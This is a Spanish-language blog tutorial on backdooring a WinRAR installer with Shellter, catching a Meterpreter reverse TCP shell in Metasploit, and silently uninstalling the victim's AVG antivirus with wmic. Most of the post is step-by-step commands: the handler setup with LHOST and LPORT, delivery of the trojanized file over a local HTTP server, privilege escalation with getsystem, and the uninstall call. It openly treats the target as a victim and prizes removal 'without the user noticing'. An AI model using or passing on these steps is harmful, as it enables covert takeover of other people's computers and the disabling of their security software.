Advertisement

header ads

HACER BYPASS Y DESINSTALAR ANTIVIRUS DESDE KALI LINUX 2.0

Hace unas horas he publicado un vídeo sobre usar un bypass pero este método lo he combinado y me ha gustado porque elimina totalmente el antivirus sin que el usuario sé cuenta.




Esta combinación de estas herramienta formamos un trió cibernético.
Vamos a usar el software de “WRAR.EXE” en el cual lo inyectamos con shellter para poner ejecutarlo también por msfconsole.
cd Downloads/shellter
Lo ejecutamos
wine shellter
Los siguientes paso sigan leyendo en el post que le deje arriba. Ahora usaremos msfconsole.
service postgresql start
msfconsole
Ahora comandamos a un exploit.
use exploit/multi/handler
Para ver los detalles
show options
Ahora nos pide la IP Y PUERTO
set LHOST IP
set LPORT 8080
Ahora vamos a usar el meterpreter para windows. En el cual usaremos el mismo que usamos con shellter.
set PAYLOAD windows/meterpreter/reverse_tcp
Ahora para ejecutarlo
exploit -j
En el cual enviamos a la victima el software o archivo “wrar.exe” en mi caso lo hare por la misma red usando SimpleHTTPServer.
Cuando la victima intente instalar el programa de winrar, aparte de instalar winrar va a instalar el exploit programado.
Active sessions
sessions -i 1
Para saber datos del sistema.
sysinfo
Vemos datos de los programas.
ps
getsystem
getuid
Estos comandos fueron para obtener información más complejo del sistema antes de ejecutar nuestra shell.
shell
Ahora aquí viene lo bueno
VAMOS A DESINSTALAR EL ANTIVIRUS O ALGÚN PROGRAMA QUE QUERAMOS.
wmic product get name
Vemos solo los nombres de los software instalado en el sistema.
wmic product where name="AVG" call uninstall /nointeractive
Lo que hacemos es dejar que el programa no se ejecute y poder desinstalarlo.
Espero que te guste y compártelo con tus amigos.

Publicar un comentario

0 Comentarios